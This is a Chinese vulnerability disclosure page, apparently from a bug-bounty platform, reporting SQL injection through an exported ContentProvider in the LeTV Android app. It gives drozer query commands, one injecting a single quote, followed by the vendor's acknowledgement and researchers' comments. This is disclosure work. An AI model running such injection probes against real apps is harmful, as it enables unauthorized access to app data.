最新版乐视网安卓客户端APP injection

下载到apk文件 反编译出来。

在这个URI上。

content://com.letv.ads.db.AdsContentProvider/ads_tablable

查看一下这个uri里面的数据

run app.provider.query content://com.letv.ads.db.AdsContentProvider/ads_table --selection ""

run app.provider.query content://com.letv.ads.db.AdsContentProvider/ads_table --selection "'"

详细说明

ContentProvider组件

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2014-11-15 18:19

厂商回复：

谢谢，马上通知相关部门进行修复。

最新状态：

暂无

1. 2014-11-15 20:02 | m1x7e1 ( 普通白帽子 | Rank:651 漏洞数:139 | 求工作)

   3

   @疯狗 狗哥，这个不是通用的么？

   1# 回复此人

2. 2014-11-15 23:37 | ihacku ( 普通白帽子 | Rank:100 漏洞数:33 | 同程旅游安全工程师。找大神带节奏，邮箱 s...)

   1

   洞主愿意来苏州吗，我们招安全工程师。

   2# 回复此人

3. 2014-11-16 10:45 | cnrstar ( 普通白帽子 | Rank:161 漏洞数:24 | Be my personal best!)

   1

   洞主这是什么漏洞？sql注入么

   3# 回复此人

4. 2014-11-16 13:16 | 瘦蛟舞 ( 普通白帽子 | Rank:765 漏洞数:83 | 铁甲依然在)

   1

   @cnrstar content provider

   4# 回复此人

5. 2014-11-16 15:30 | Xser ( 普通白帽子 | Rank:408 漏洞数:91 | JDSec)

   1

   不是通用的，算一个web问题

   5# 回复此人

6. 2014-11-17 13:26 | xiaoL ( 普通白帽子 | Rank:361 漏洞数:67 | PKAV技术宅社区! Blog:http://www.xlixli....)

   1

   @瘦蛟舞 是通过content provider调用了web的数据泄露？

   6# 回复此人

7. 2014-11-18 22:04 | F4K3R ( 普通白帽子 | Rank:318 漏洞数:34 | 求团队收留。)

   1

   app 的sql注射~

   7# 回复此人

8. 2014-11-19 17:42 | pandas ( 普通白帽子 | Rank:730 漏洞数:84 | 国家特级保护动物)

   1

   应该是算通用的

   8# 回复此人

9. 2015-05-05 14:09 | 小荷才露尖尖角 ( 普通白帽子 | Rank:141 漏洞数:16 | less is more)

   0

   泄露的数据并不敏感啊

   9# 回复此人